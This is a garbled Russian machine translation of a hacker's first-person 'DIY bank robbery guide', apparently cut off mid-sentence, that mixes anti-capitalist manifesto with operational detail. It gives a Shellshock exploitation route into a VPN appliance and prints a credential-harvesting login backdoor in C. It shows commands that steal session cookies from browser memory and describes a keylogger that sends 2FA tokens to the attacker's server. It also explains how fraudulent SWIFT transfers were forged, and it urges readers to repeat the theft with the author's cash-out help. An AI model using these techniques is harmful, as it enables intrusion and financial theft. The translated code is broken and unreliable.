_ _ _ ____ _ _
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
Руководство по ограблению банков своими руками
^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
Подкомитет Маркос
Я дикий ребенок
Невинный, свободный, дикий
У меня все возрасты
Мои бабушка и дедушка живут во мне
Я брат облаков
И я знаю только, как поделиться
Я знаю что все принадлежит всем
что все живое во мне
Мое сердце звезда
Я сын земли
Я путешествую на борту своего духа
Дорога в вечность
Это мое простое слово, которое затрагивает сердца простых и простых людей.
скромный, но в то же время достойный и непокорный. Это мое простое слово для подсчета
моих хаков, и приглашать других людей взламывать весело
восстание.
Я взломал банк. Я сделал это, чтобы увеличить денежные средства, но на этот раз с тех пор, как
вниз и простые и смиренные люди, которые сопротивляются и восстают против
несправедливость во всем мире. Другими словами: я ограбил банк и отдал
Деньги. Но это сделал не я один. Движение за свободное программное обеспечение,
наступательное сообщество PowerShell, проект metasploit и хакерское сообщество
в общем, именно они сделали возможным этот взлом. Сообщество exploit.in
позволил превратить взломанные компьютеры банка в наличные
и биткойн. Проекты Tor, Qubes и Whonix вместе с криптографами и
активисты, которые защищают конфиденциальность и анонимность, они мои нахуали, это
скажем, мои защитники [1]. Они сопровождают меня каждую ночь и позволяют мне продолжать
Свобода.
Ничего сложного не делал. Я видел только несправедливость в этом мире, я чувствовал любовь
для всех существ, и я выразил эту любовь наилучшим образом, через
инструменты, которыми я умею пользоваться. Меня не волнует ненависть ни к банкам, ни к богатым, но
любовь к жизни и стремление к миру, в котором каждый может реализовать свои
потенциал и жить полноценной жизнью. Я хотел бы немного объяснить, как я вижу мир,
чтобы вы могли понять, как я себя чувствую и поступаю таким образом.
И я также надеюсь, что это руководство - рецепт, которому вы сможете следовать, комбинируя
те же ингредиенты, чтобы испечь тот же торт. Кто знает, вот ты где
такие мощные инструменты в конечном итоге служат вам также для выражения
любовь, которую они чувствуют.
Мы все дикие дети
невинный, свободный, дикий
Мы все братья по деревьям
дети земли
Нам просто нужно вложить это в наши сердца
зажженная звезда
(песня Альберто Кусельмана и Чамала)
Полиция собирается вложить уйму ресурсов в мое расследование. Они считают, что
система работает, или, по крайней мере, она будет работать, когда они поймают все
"плохие парни". Я не более чем продукт системы, которая не работает.
Пока несправедливость, эксплуатация, отчуждение, насилие и
экологического разрушения, многие другие придут, как я: бесконечная
люди, которые будут отвергать как незаконную плохую систему, ответственную за это
страдания. Эта дрянная система не будет исправлена арестом меня. я
только один из миллионов семян, которые Тупак посадил 238 лет назад в Ла
Мир [2], и я надеюсь, что мои действия и писания поливают семена восстания.
в их сердцах.
[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
[2] это было перед тем, как быть убитым испанцами, как раз за день, как вчера, когда
Он сказал, что «они меня только убьют, но завтра я вернусь, и меня будут миллионы».
____________________________________________
<Мы закрыли лица, чтобы их увидели>
--------------------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
Чтобы заставить себя слушать, хакерам иногда приходится закрывать нам лица, потому что
Мы не заинтересованы в том, чтобы они видели наше лицо, но понимали наше слово. В
маска может быть от Гая Фокса, Сальвадора Дала, Fsociety или в каком-то случае
марионетка хохлатой жабы. По близости на этот раз я пошел раскопать
покойный, чтобы одолжить мне свою лыжную маску. Тогда я думаю, что мне следует уточнить, что
Суп Маркос невиновен во всем, что здесь говорится, потому что, помимо того, что он
мертв, я не советовался с ним. Надеюсь, его призрак, если он узнает из гамака
Чьяпас, умей найти добро, чтобы, как там говорят, "отбросить это
глубокая подделка »с тем же жестом, с которым уходит неподходящее насекомое - хорошо
это мог быть жук.
Даже в этом случае с лыжной маской и сменой названия многие из тех, кто поддерживает мои
действия могут обратить на меня слишком много внимания. С вашим собственным
автономия, разрушенная пожизненным господством, они будут искать
Лидер, за которым нужно следовать, или герой, который их спасет. Но только за лыжной маской
Я девушка. Мы все дикие дети. Нам нужно только поставить звезду
em chamas em nossos coraГes.
- [1 - Почему экспроприировали] ---------------------------------------- --- ----------
Капитализм - это система, в которой меньшинство привыкло
подавляющее большинство мировых ресурсов через войны, кражи и
операция. Забрав у нас общее [1], они вынудили тех, кто ниже
быть под контролем меньшинства, которому все принадлежит. Это система
принципиально несовместим со свободой, равенством, демократией и
Suma Qamaà ± a (Хорошая жизнь). Это может показаться смешным для тех из нас, кто вырос в
пропагандистский аппарат, который научил нас, что капитализм - это свобода, но в
Правда, то, что я говорю, не является новой или спорной идеей [2]. Основатели
Соединенные Штаты Америки знали, что им нужно было выбирать между созданием
капиталистическое общество или свободное и демократическое. Мэдисон признала, что "
человек, который обладает богатством, тот, кто лежит на диване или катится в своей карете,
не может судить о желаниях или чувствах поденщика ". Но чтобы защитить себя
Столкнувшись с «духом уравнивания» безземельных рабочих, ему казалось,
что только землевладельцы должны голосовать, и что правительство должно
служат для «защиты зажиточного меньшинства от подавляющего большинства». Джон
Джей подошел ближе и сказал: «Те, кто владеет страной, должны
управляй им. "
____________________________________________________
/ Зеленого капитализма не существует. \
| Сделаем капитализм историей, прежде чем мы |
\ стать историей. /
-------------------------------------------------- -
\ / \ ___ / \
\ // \ / \ / \\
((OO))
\\ / \ //
\ / | | \ /
| | | | Евгений, великий игнорируемый слон, не понимает, почему все
| | | | Они делают вид, что не видят вас на панелях по изменению климата, вот так
| или | что здесь я даю вам возможность сказать свои строки.
| | | |
| м | | м |
Точно так же, как Белл Хукс [3] утверждает, что отказ от культуры
Патриархальное господство - это акт защиты мужских интересов (уже
это эмоционально калечат их и мешает им чувствовать любовь и связь в
полный), я считаю, что культура господства капитализма оказывает влияние
похожи на богатых, и что они могли бы жить более полной и удовлетворяющей жизнью
если они отвергли классовую систему, от которой, по их мнению, они выиграли. Для многих,
классовые привилегии приравниваются к детству эмоционального пренебрежения, за которым следовали
Из жизни поверхностных социальных взаимодействий и бездумной работы. Может
что в глубине души они знают, что могут только искренне общаться с людьми
когда они работают с ними как с равными, а не когда они ставят их себе на службу.
Они могут знать, что делиться своим материальным богатством - лучшее, что они могут сделать.
с ней. Вы также можете знать, что значительный опыт,
Связи и отношения, которые имеют значение, - это не те, которые исходят от
торговое взаимодействие, но именно для того, чтобы отвергнуть логику рынка
и отдавать, не ожидая ничего взамен. Может быть, они знают, что все, что им нужно
сбежать из тюрьмы и по-настоящему жить - значит отпустить, отказаться от контроля и
совершить прыжок веры. Но большинству из них не хватает смелости.
Тогда было бы наивным с нашей стороны направить свои усилия на то, чтобы
произвести какое-то духовное пробуждение у богатых [4]. Как говорит Ассата
Шакур: «Никто в мире, никто в истории не достиг своего
свободы, апеллируя к моральным чувствам своих угнетателей ".
богатые распределяют свои деньги почти всегда таким образом, чтобы
система, которая с самого начала позволила им накопить огромное и незаконное богатство
[5]. И вряд ли это изменение произойдет в результате политического процесса;
как говорит Люси Парсонс: "Давайте никогда не будем вводить нас в заблуждение тем, что богатые
пусть они проголосуют за то, чтобы отобрать у них богатство ». Колин Дженкинс оправдывает
экспроприация с такими словами [6]:
Не заблуждайтесь, экспроприация - это не воровство. Это не конфискация
деньги, заработанные «в поте лица». Это не кража собственности
частный. Это, скорее, мелиорация огромных участков земли и
богатство, созданное с помощью украденных природных ресурсов, рабство
человеческую, принудительную рабочую силу, накопленную за сотни лет одним
небольшое меньшинство. Это богатство ... незаконно, как морально, так и
относительно механизмов эксплуатации, которые были использованы для его создания.
Для Колина первым шагом является то, что «мы должны освободиться от нашего рабства.
ментальный (полагая, что богатство и частная собственность были заработаны
те, кто их монополизирует; и это, следовательно, следует уважать,
почитать, и даже за чем гоняться), открыть наши умы, учиться и
учиться у истории и вместе признавать эту незаконность ».
несколько книг, которые помогли мне в этом [7] [8] [9] [10] [11].
По словам Барака Обамы, экономическое неравенство является «определяющим вызовом для наших
время ". Взлом компьютеров - мощное средство борьбы с
экономическое неравенство. Бывший директор АНБ Кейт Александер соглашается
и говорит, что хакерство несет ответственность за «самый крупный перевод богатства из
сказка".
_________________________
/ История наша \
\ и хакеры это делают! /
-------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
За гранью настоящего, сейчас и всегда!
[1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
[2] https://chomsky.info/commongood02/
[3] Воля к изменениям: мужчины, мужественность и любовь
[4] его собственная религия уже очень ясно говорит об этом:
https://dailyverses.net/es/materialismo
[5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
[6] http://www.hamptoninstitution.org/exppriation-or-bust.html
[7] Манифест демократической цивилизации. Том 1, Цивилизация: Эпоха
богов в масках и покрытых королей
[8] Калибен и ведьма
[9] В долгу: альтернативная история экономики
[10] Другая история США
[11] Открытые вены Латинской Америки
_________________________________
<Наше оружие - наша клавиатура>
---------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
'' ^^ ^^
- [2 - Введение] ------------------------------------------- - --------------
Это руководство объясняет, как я взломал Cayman Bank and Trust Company.
(Остров Мэн). Почему я публикую это почти четыре года спустя?
1) Показать, что возможно
Хакеры, работающие над социальными изменениями, ограничились разработкой
инструменты безопасности и конфиденциальности, DDoS, выполняют дефейсы и утечки.
Куда бы вы ни пошли, вас ждут радикальные проекты по полному изменению общества.
шаткое состояние, и они могли бы многое сделать с небольшими деньгами
экспроприирован. По крайней мере, для рабочего класса ограбление банка - это что-то
социально приемлемые, а тех, кто это делает, считают народными героями. На
В эпоху цифровых технологий ограбление банка - это ненасильственный акт, менее рискованный, и
награда больше, чем когда-либо. Так почему только хакеры из
черную шляпу, которую они делают для своей личной выгоды, и никогда
хактивистов для финансирования радикальных проектов? Может они так не думают
в состоянии это сделать. О взломах крупных банков сообщают в новостях каждые
а также взлом Бангладешского банка [1], приписываемый Корее
Norte, или взломы банков, приписываемые группе Carbanak [2], которую они описывают
как очень большая и хорошо организованная группа русских хакеров, с разными
члены, которые будут специализироваться на различных задачах. И, ну это не так
сложный.
Это из-за нашего коллективного убеждения, что финансовая система не подлежит сомнению.
что мы контролируем себя и поддерживаем систему классов
без каких-либо действий со стороны вышеперечисленных [3]. Чтобы увидеть, насколько уязвимы и
на самом деле хрупкая финансовая система помогает нам избавиться от этой галлюцинации
коллектив. Вот почему у банков есть сильный стимул не отчитываться.
взлома и преувеличить, насколько изощренны злоумышленники. Ни один из
О финансовых взломах, которые я совершал или о которых я знал, никогда не сообщалось.
Это будет первое, и не потому, что банк хотел, а потому, что я
Решил опубликовать.
Как вы скоро узнаете из этого домашнего руководства, взломайте банк и
перевод денег через сеть SWIFT не требует поддержки каких-либо
правительство или большая специализированная группа. Это вполне возможно
будучи простым любителем и хакером, работающим только с инструментами
аудитории и базовые знания о том, как писать сценарий.
[1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
[2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
[3] https://es.wikipedia.org/wiki/Hegemonía_cultural
2) Помогите снять наличные
Многие из тех, кто это прочитает, уже имеют или после небольшого изучения будут
в состоянии приобрести навыки, необходимые для выполнения взлома
как это. Однако многие обнаружат, что им не хватает
криминальные связи, необходимые для приведения ручек в хорошее состояние. В себе
Во всяком случае, это был первый взломанный банк, и на тот момент у него было всего несколько
немногочисленные и посредственные счета, готовые для снятия наличных (известные
как банк падает), так что всего несколько сотен тысяч
Я смог полностью вывести деньги, когда обычно снимаются миллионы. Теперь вместо этого да
что у меня есть знания и связи, чтобы получать деньги более серьезно, от
поэтому, если они обнаружат, что взламывают банк, но им нужна помощь в конвертации
реальными деньгами, и они хотят использовать эту шерсть для финансирования проектов.
радикальный социальный, свяжитесь со мной.
3) Сотрудничайте
Можно взламывать банки, как индивидуальный любитель, но
Суть в том, что, в общем, это не так просто, как я это здесь изображаю. Мне повезло с
этот банк по нескольким причинам:
1) Это был небольшой банк, поэтому мне потребовалось гораздо меньше времени, чтобы добраться до
понимаю, как все работало.
2) У них не было процедуры проверки отправленных быстрых сообщений.
Он есть во многих банках, и вам нужно написать код, чтобы скрыть свои
переводы из вашей системы мониторинга.
3) Они использовали только аутентификацию по паролю для доступа к приложению с
которые были подключены к сети SWIFT. Большинство банков сейчас используют RSA
SecurID или некоторая форма 2FA. Вы можете пропустить это, набрав код для
получать предупреждение, когда ваш токен входит, чтобы вы могли использовать его раньше
истекает. Это проще, чем кажется: я использовал Get-Keystrokes [1],
модифицируя его так, чтобы вместо сохранения нажатых клавиш
GET-запрос к моему серверу каждый раз, когда обнаруживается, что они вошли в
Имя пользователя. Этот запрос добавляет имя пользователя к URL-адресу и,
по мере ввода токена выполняется несколько GET с цифрами токена.
присоединен к URL-адресу. Со своей стороны, я пока оставляю это включенным:
ssh мне @ my_secret_server 'хвост -f / var / log / apache2 / access_log'
| пока читал я; do echo $ i; aplay alarm.wav &> / dev / null; Выполнено
Если это веб-приложение, вы можете пропустить двухфакторную аутентификацию, украв файл cookie.
после аутентификации. Я не APT с командой программистов
что они могут делать мне специальные инструменты. Я простой человек живущий
из того, что дает вам терминал [2], поэтому я использую:
procdump64 / acceptpteula -r -ma PID_del_browser
strings64 / acceptpteula * .dmp | findstr PHPSESSID 2> нуль
или передав его через findstr, а не через строки, что делает его гораздо более
быстрый:
findstr PHPSESSID * .dmp> tmp
strings64 / acceptpteula tmp | findstr PHPSESSID 2> нуль
Другой способ пропустить его - получить доступ к сеансу со скрытым VNC (hvnc).
после аутентификации или с небольшим творчеством
вы могли бы сосредоточиться на другой части их процесса вместо отправки сообщений
SWIFT напрямую.
Я думаю, если бы он сотрудничал с другими опытными банковскими хакерами, мы могли бы
сделать нас сотнями банков, таких как Карнабак, вместо того, чтобы делать один из многих
в том числе самостоятельно. Так что, если у вас есть опыт использования подобных хаков и
вы хотите сотрудничать, свяжитесь со мной. Вы найдете мою электронную почту и мой ключ PGP в конце
предыдущее руководство [3].
[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
Exfiltration / Get-Keystrokes.ps1
[2] https://lolbas-project.github.io/
[3] https://www.exploit-db.com/papers/41914
________________________________________
/ Если ограбление банка изменило ситуацию, \
\ сделает это незаконным /
----------------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
- [3 - Будьте осторожны] ---------------------------------------- - -----
Важно соблюдать некоторые простые меры предосторожности. Я буду ссылаться на это
тот же раздел моего последнего руководства [1], так как, по-видимому, он хорошо работает, просто
[два]. Все, что я должен добавить, это то, что, по словам Трампа, «Если только
поймать хакеров с поличным, сложно определить, кто есть что
выполнял взлом ", так что полиция получает все больше и больше
творческий [3] [4] в ее попытках поймать преступников с поличным (когда
ваши зашифрованные жесткие диски разблокированы). Так что было бы неплохо, если бы
Например, вы носите с собой определенное устройство Bluetooth и настраиваете
компьютер выключаться, когда вы выходите за пределы определенного диапазона, или
когда акселерометр обнаруживает движение или что-то в этом роде.
Вы можете писать длинные статьи, подробно описывающие ваши действия, а не вашу идеологию.
быть самым безопасным в мире (ой!), но иногда мне кажется, что я должен
сделай это.
Если бы я не верил в то, кто меня слушает
Если бы я не верил в то, что болит
Если бы я не верил в то, что осталось
Если бы я не верил в то, с чем сражаюсь
Что за вещь ...
Какой была бы булава без каменоломни?
[1] https://www.exploit-db.com/papers/41914
[2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
phineas-fisher.html
[3] https://www.wired.com/2015/05/silk-road-2/
[4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
Alphabay-арест-видео
, - \ __
| f- "Y \ ____________________
\ () 7L / | Будь геем! |
cgD | Соверши преступление! | __ _
| \ (---------------------. 'Y'>,
\ \ \ / _ _ \
\\\ \) (_) (_) (|}
\\\ {4A} /
\\\ \ uLuJJ / \ l
\\\ | 3 п) /
\\\ ___ __________ / nnm_n //
c7 ___-__, __-) \, __) (". \ _> - <_ / D
// V \ _ "-._.__ G G_c __.-__ <" / (\
<"-._> __-, G _.___) \ \ 7 \
("-.__. | \" <.__.- ") \ \
| "-.__" \ | "-.__.-". \ \ \
("-.__" ". \" -.__.- ". | \ _ \
\ "-.__" "|! |" -.__.- ".) \ \
"-.__" "\ _ |" -.__.- "./ \ l
".__" ""> G> -.__.- "> .--, _
"" ГРАММ
Многие винят квир-людей в упадке этого общества;
мы гордимся этим
Некоторые считают, что мы хотим сгореть дотла
эта цивилизация и ее моральная ткань;
Они не могли быть более правильными
Нас часто описывают как развратных, упадочных и непослушных.
Но ох! Они еще ничего не видели
theanarchistlibrary.org
- [4 - Получить доступ] ------------------------------------------ - -----------
В другом месте [1] я рассказывал им об основных способах получения
первоначальный доступ к сети компании во время целевой атаки. Тем не мение,
Это не была целенаправленная атака. Я не собирался взламывать конкретный банк,
он хотел взломать любой банк, что в конечном итоге оказалось утомительной работой
проще. Этот тип неспецифического подхода был популяризирован Lulzsec и
Анонимный [2]. В рамках [1] я подготовил эксплойт и несколько инструментов для
пост-эксплойт для популярного VPN-устройства. Затем я начал сканировать
весь Интернет с помощью zmap [3] и zgrab для идентификации других устройств
уязвимый. Я попросил сканер сохранить уязвимые IP-адреса вместе с
"общее имя" и "альтернативные имена" SSL-сертификата устройства, имена
windows домена устройства и обратный поиск IP-адреса в DNS. Ты
Я выполнил поиск с помощью команды grep, ища слово «банк», и этого оказалось достаточно для
выбрать, но правда в том, что слово "Кайман" меня привлекло, и вот так я пришел
чтобы сохранить это.
[1] https://www.exploit-db.com/papers/41914
[2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
[3] https://github.com/zmap/zmap
---- [4.1 - Эксплойт] ---------------------------------------- ----------------
Когда я опубликовал свое последнее руководство «Сделай сам» [1], я не раскрыл подробностей использования
sonicwall, который он использовал для взлома Hacking Team, поскольку он был очень полезен для
другие хаки, вроде этого, и я еще не закончил с ними развлечься.
Решив взломать Hacking Team, я потратил недели на разработку
обратный к его модели ssl-vpn от sonicwall, и даже удалось найти
различные уязвимости, связанные с повреждением памяти, более или менее сложно
взорваться, прежде чем я понял, что устройство легко использовать
с шелушением [2]. Когда вышел Shellshock, многие устройства sonicwall были
уязвим, просто с запросом к cgi-bin / welcome и полезной нагрузкой в
пользовательский агент. Dell выпустила обновление безопасности и рекомендации для этих
версии. Версия, используемая Hacking Team и этим банком, имела версию
bash уязвим, но запросы cgi не запускали шеллшок, за исключением
запросы к сценарию оболочки, и был доступен только один:
cgi-bin / jarrewrite.sh. Похоже, это ускользнуло от людей из Dell в их записке:
поскольку они никогда не выпускали обновления безопасности или рекомендации по этому поводу
версия sonicwall. И любезно, Dell сделал два root-идентификатора unix setuid,
оставляя устройство легко рутировать.
В моем последнем руководстве многие читали, что я провел недели, исследуя устройство.
пока они не придумали эксплойт, и они решили, что это означает, что я какой-то парень
хакерская элита. Реальность, то есть тот факт, что мне потребовалось две недели
понимаете, что это было тривиально эксплуатировать с Shellshock, может быть, меньше
мне лестно, но я думаю, что это также более вдохновляет. Покажи это
Вы действительно можете сделать это сами. Тебе не нужно быть гением, я
Конечно, нет. На самом деле моя работа против Hacking Team начала
годом ранее. Когда я обнаружил Hacking Team и Gamma Group в
Исследование CitizenLab [3] [4], я решил немного изучить и посмотреть, смогу ли я
найти что-то. Я ничего не добился с Hacking Team, но мне повезло с
Gamma Group, и мне удалось взломать их портал поддержки клиентов с помощью sql-инъекции.
базовые уязвимости и уязвимости загрузки файлов [5] [6]. Однако, несмотря на
что их сервер поддержки дал мне поворот к внутренней сети Gamma
Group мне не удалось проникнуть дальше в компанию. начиная с этого
опыт работы с Gamma Group и другими хакерами, я понял, что я
действительно ограничен моим незнанием о повышении привилегий и
боковое перемещение в окнах доменов, активном каталоге и окнах в целом.
Так что я учился и практиковался (см. Раздел 11), пока не почувствовал, что готов
чтобы снова нанести визит Hacking Team почти год спустя. Упражняться
окупился, и на этот раз я смог полностью взять на себя обязательство
компания [7]. Прежде чем я понял, что могу заняться шелушением, я был
готовы провести целые месяцы счастливой жизни, изучая развитие
эксплойтов и написания доверенного эксплойта для одной из уязвимостей
повреждение памяти, которое он обнаружил. Я знал только эту хакерскую команду
должны быть разоблачены, и это займет столько времени, сколько необходимо, и
он узнает то, чему он должен научиться, чтобы получить это. Для выполнения этих
хаки не обязательно должны быть блестящими. Вам даже не нужны большие знания
техник. Вам просто нужна целеустремленность и вера в себя.
[1] https://www.exploit-db.com/papers/41914
[2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
[3] https://citizenlab.ca/tag/hacking-team/
[4] https://citizenlab.ca/tag/finfisher/
[5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
Бахрейн-трек-арабские-весенние протестующие /
[6] https://www.exploit-db.com/papers/41913
[7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
---- [4.2 - Бэкдор] ---------------------------------------- ---------------
Частью бэкдора, который я подготовил для Hacking Team (см. [1], раздел 6), был
Простая оболочка на странице входа в систему для сбора паролей:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main ()
{
char buf [2048];
int nread, pfile;
/ * вытаскивает журнал, если мы отправляем специальный файл cookie * /
char * cookies = getenv ("HTTP_COOKIE");
if (cookies && strstr (cookies, "наш личный пароль")) {
write (1, "Content-type: text / plain \ n \ n", 26);
pfile = open ("/ tmp / .pfile", O_RDONLY);
в то время как ((nread = read (pfile, buf, sizeof (buf)))> 0)
написать (1, buf, nread);
выход (0);
}
/ * принципал сохраняет данные POST и отправляет их потомку,
это настоящая программа входа в систему * /
int fd [2];
труба (фд);
pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork ()) {
закрыть (fd [0]);
while ((nread = read (0, buf, sizeof (buf)))> 0) {
написать (fd [1], buf, nread);
написать (pfile, buf, nread);
}
написать (pfile, "\ n", 1);
закрыть (fd [1]);
закрыть (pfile);
ждать (NULL);
} еще {
закрыть (fd [1]);
dup2 (fd [0], 0);
закрыть (fd [0]);
execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
"userLogin", NULL);
}
}
В случае с Hacking Team они вошли в VPN с одноразовыми паролями,
так что VPN дал мне доступ только к сети, и оттуда я взял
дополнительные усилия, чтобы получить администратора домена в вашей сети. В другом руководстве я написал
о побочных проходах и повышении привилегий в доменах Windows [1]. В этом
Однако в данном случае использовались те же пароли домена Windows.
используется для аутентификации по VPN, поэтому я смог получить много
пароли пользователей, включая пароли администраторов домена. Теперь у меня было всего
доступ к вашей сети, но обычно это самая простая часть. Самая тяжелая часть
это понять, как они работают и как получить пистолет.
[1] https://www.exploit-db.com/papers/41914
---- [4.3 - Интересные факты] ---------------------------------------- ------------
После расследования взлома я нашел его интересным.
видите, что примерно в то же время, что и я, банк, возможно, был
взломано кем-то другим через целевое фишинговое письмо [1].
Как говорится в старой поговорке: «Дайте человеку эксплойт, и он получит доступ к
день, научите его фишеру, и он будет иметь к нему доступ всю свою жизнь »[2].
кто-то другой случайно и одновременно со мной поставил эту скамейку
маленькая цель (зарегистрировали домен, аналогичный реальному домену банка
чтобы иметь возможность отправлять фишинг оттуда) предполагает, что взлом банка
они встречаются гораздо чаще, чем известно.
Забавное предложение, чтобы вы могли следить за исследованиями вашего
взлом - это резервный доступ, который вы не коснетесь, если не
теряют нормальный доступ. У меня есть простой скрипт, который ожидает от команд
один раз в день или реже, чтобы поддерживать долгосрочный доступ в случае
которые блокируют мой обычный доступ. Потом у меня была империя PowerShell [3]
звонил домой чаще с другого IP-адреса и использовал empire для
запустить meterpreter [4] против третьего IP-адреса, где он выполнял большую часть
моя работа. Когда PWC начала расследование взлома, они обнаружили, что я использую
empire и meterpreter, очистили эти компьютеры и заблокировали эти IP-адреса, но
они не обнаружили моего резервного доступа. PWC разместила
мониторинг сети, чтобы иметь возможность анализировать трафик и видеть, есть ли еще
зараженные компьютеры, поэтому я не хотел сильно подключаться к их сети. Только
Я запустил mimikatz один раз, чтобы получить новые пароли, и оттуда
Я смог продолжить его исследование, прочитав его электронные письма в веб-сайте Outlook.
[1] стр. 47, Project Pallid Nutmeg.pdf, торрент
[2] [3] https://github.com/EmpireProject/Empire
[4] https://github.com/rapid7/metasploit-framework
- [5 - Общие сведения о банковских операциях] ------------------------------------
Чтобы понять, как работает банк и как в нем могут быть деньги, я проследил
методы, которые я обобщил в [1], в разделе «13.3 - Внутреннее распознавание».
Я загрузил список всех имен файлов, я выполнил поисковый запрос
слов типа «SWIFT» и «перевод», и я скачал и прочитал все
файлы с интересными названиями. Я также искал электронные письма сотрудников, но из
Безусловно, наиболее полезной техникой было использование клавиатурных шпионов и снимков экрана для
понаблюдайте за тем, как работали сотрудники банка. Я не знал этого в то время, но
для этого Windows предлагает очень хороший инструмент мониторинга [2]. Откуда я знаю
описана в технике № 5 раздела 13.3 в [1], я сделал снимок экрана
нажатия клавиш в домене (включая заголовки окон), я сделал
grep ищет SWIFT и обнаружил, что некоторые сотрудники открывают SWIFT Access
Сервисное бюро - Вход в систему. Для этих сотрудников я запустил meterpreter, как в [3], и
Я использовал модуль post / windows / gather / screen_spy, чтобы делать скриншоты
каждые 5 секунд, чтобы увидеть, как они работают. Они использовали приложение
удаленный Citrix из нижней линии компании [4] для доступа к сети SWIFT, где
Каждое платежное сообщение SWIFT MT103 должно было пройти через трех сотрудников: одного
для «создания» сообщения, один для «проверки» его, а другой для «авторизации». Какие
У него уже были все свои учетные данные благодаря кейлоггеру, я смог справиться с
облегчить себе три шага. И из того, что я знал, увидев их
работают, они не просматривали отправленные сообщения SWIFT, поэтому вы должны иметь
достаточно времени, чтобы получить деньги из моего банка, выпадет до банка
заметил и попробовал поменять передачи.
[1] https://www.exploit-db.com/papers/41914
[2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
удаленно-с-metasploit /
[3] https://www.trustedsec.com/blog/no_psexec_needed/
[4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
_________________________________________
/ Кто грабит вора, ему сто лет \
\ прощения. /
-----------------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
- [6 - Отправьте деньги] ----------------------------------------- - ------------
Я не имел большого представления о том, что делаю, поэтому я узнал
Кстати. Как-то пошли первые отправленные мной переводы
хорошо. На следующий день я облажался, отправив перевод в Мексику, который поставил
конец моему веселью. Этот банк отправлял ваши международные переводы
через ваш корреспондентский счет в Natwest. Я видел, что учетная запись
Корреспондент переводов в фунтах стерлингов был указан как
NWBKGB2LGPL, а для остальных - NWBKGB2LXXX. Перенос
Мексиканский был в фунтах стерлингов, поэтому я решил, что мне нужно указать NWBKGB2LGPL как
корреспондент. Если бы я подготовил его лучше, я бы знал, что LPG вместо
XXX заявил, что платеж будет отправлен через службу быстрых платежей
Великобритания, а не как международный трансфер, что, очевидно,
Что ж, это не сработает, когда вы попытаетесь отправить деньги в Мексику. Так
банк получил сообщение об ошибке. В тот же день я также попытался отправить
платеж в размере 200 тыс. фунтов стерлингов в Великобританию с использованием NWBKGB2LGPL, который не был произведен, потому что 200 тыс. превысили
ограничение доставки с использованием быстрых платежей, и пришлось бы использовать NWBKGB2LXXX в
время. Они также получили сообщение об ошибке. Они читают сообщения,
Они исследовали и нашли остальные мои переводы.
- [7 - Кнопка] ------------------------------------------ - -------------------
Из того, что я пишу, вы получите полное представление о моих идеалах.
какие вещи я поддерживаю вас. Но я не хочу видеть никого в затруднительном положении
для получения экспроприированных средств, поэтому больше ни слова о том, где они
это была шерсть. Я знаю, что журналисты, вероятно, захотят поставить несколько
число того, сколько долларов было распределено в этом хаке и других
похоже, но я предпочитаю не поощрять нашу извращенную привычку измерять
акции только из-за их экономической ценности. Любое действие достойно восхищения, если оно таково.
Это происходит от любви, а не от эго. К сожалению, верхушка, богатые и
влиятельные, общественные деятели, бизнесмены, люди на должностях
«важные», те, которые наше общество уважает и ценит больше всего, те, которые
помещены туда, где они основаны больше на эго, чем на любви. В
простые, скромные и «невидимые» люди, на которых мы уже должны смотреть
кем мы должны восхищаться.
- [8 - Криптовалюты] ------------------------------------------- - -------------
Перераспределить экспроприированные деньги на чилийские проекты, направленные на социальные изменения
Положительно, было бы проще и безопаснее, если бы эти проекты принимали пожертвования
анонимно через криптовалюты, такие как monero, zcash или, по крайней мере, биткойн. Это понятно
что многие из этих проектов не любят криптовалюты, поскольку
они больше похожи на какую-то странную гиперкапиталистическую антиутопию, чем на экономику
социальные, с которыми мы мечтаем. Я разделяю ваш скептицизм, но думаю, что они
Полезно для разрешения анонимных пожертвований и транзакций путем ограничения
государственный надзор и контроль. Так же, как наличные деньги, использование которых многие
страны пытаются ограничить по той же причине.
- [9 - Powershell] ------------------------------------------- - ----------------
В этой операции, как и в [1], я много использовал PowerShell. Для
тогда Powershell был супер крутым, вы могли делать все, что угодно,
вы хотели бы, без обнаружения антивирусов и с очень небольшим количеством криминалистических исследований. Такое случается
что с введением AMSI [2] наступательная Powershell уходит на пенсию.
Сегодня наступательный C # находится на подъеме с такими инструментами, как
[3] [4] [5] [6]. AMSI приходит в .NET с 4.8, поэтому инструменты в
C #, вероятно, останется еще пара лет до того, как они устареют.
И затем мы вернемся к использованию C или C ++, или, возможно, Delphi вернется к
мода. Конкретные инструменты и методы меняются каждые несколько лет, но в
суть не столько в том, что меняется, сегодня хакерство по сути все еще
То же, что и в 90-е. Собственно все скрипты powershell
